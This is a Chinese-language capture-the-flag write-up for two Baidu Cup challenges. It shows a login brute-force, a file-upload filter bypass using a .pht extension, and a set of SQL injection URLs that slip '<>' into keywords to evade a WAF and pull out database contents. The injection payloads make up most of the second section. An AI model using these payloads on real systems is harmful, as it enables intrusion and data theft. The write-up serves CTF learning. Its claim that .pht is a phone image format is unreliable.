百度杯writeup

  百度杯有点难度啊,做了好久还是不会做,参考其他人做了几道。还有几道没有做,以后继续做做

一、123

http://3314e738918246a0bb89cd7d73b4000ad41ccb304b974710.game.ichunqiu.com/login.php
提示:12341234,然后就解开了

老规矩,先看看源代码有没有提示什么的,发现有提示啊

那么访问user.php看看,发现是一片空白,源代码也没有什么提示,想想临时文件试试,像~、bak等等,构造代码

http://3314e738918246a0bb89cd7d73b4000ad41ccb304b974710.game.ichunqiu.com/user.php.bak

可是竟然出现了405,显示被拦了。POST访问便可通过

发现临时文件全是一些用户名,登录界面没有任何限制,可以用buru进行爆破登录,根据上面源码提示进行爆破

我们先在1990里试试

爆破出用户名和密码:lixiuyun lixiuyun1990,继而登录

没有什么信息,又是查看源代码

发现上传地方被注释掉了,我们还原一下,得出上传页面上传,通过改后缀名为通过 a.jpg.pht得出

pht : 也是一种图片的格式,多数是由手机拍摄的

发现有一个view.php,继续跟进http://773e88c7e5d14ec1b93b571dcce597ba13ae6d4f98d44d86.game.ichunqiu.com/view.php
访问发现不在这,提示file?,继续进行各种测试,最后构造双flag得出
http://773e88c7e5d14ec1b93b571dcce597ba13ae6d4f98d44d86.game.ichunqiu.com/view.php?file=flaflagg

<?php 
echo 'flag is here';
'flag{94c0e93e-1cd1-4240-82bd-a13a6a06701f}-';
?>

二、注入

http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1

由burp抓包发现过滤<>构造:

http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1 o<>rder b<>y 3

http://b6106ae09aa545d8b72a9ad59926e77bee2d261106ad44c8.game.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,2,3

http://65c9963a9937461aadae1d39b40ff2bcb1bc9016780643b2.game.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,(se<>lect column_name fr<>om informat<>ion_schema.columns wh<>ere table_schema='sqli' an<>d table_name='info' lim<>it 2,1),3

http://65c9963a9937461aadae1d39b40ff2bcb1bc9016780643b2.game.ichunqiu.com/index.php?id=1 uni<>on se<>lect 1,(sel<>ect flAg_T5ZNdrm fr<>om info lim<>it 1),3

1、.接着用联合语句查看可显示字段:

php?id=1  un<>ion s<>elect 1,2,3

返回了一个2.说明第二个字段是可显示的。

2、.爆表名:

index.php?id=1  un<>ion s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

返回了info

3、爆字段名

/index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(column_name),3 from information_schema.columns where table_name=0x696e666f

table name后面的参数是0x加上刚才的info转为16进制。

这时发现又出现了405,说明加入的东西肯定有些事不能绕过防火墙的,同理,用<>绕过,

/index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(c<>olumn_name),3 from information_schema.colu<>mns wh<>ere table_name=0x696e666f

返回了id,title,flAg_T5ZNdrm三个字段。

4、爆字段flAg_T5ZNdrm里面的内容

index.php?id=1  un<>ion s<>elect 1,gro<>up_con<>cat(flAg_T5ZNdrm),3 from info

返回了flag。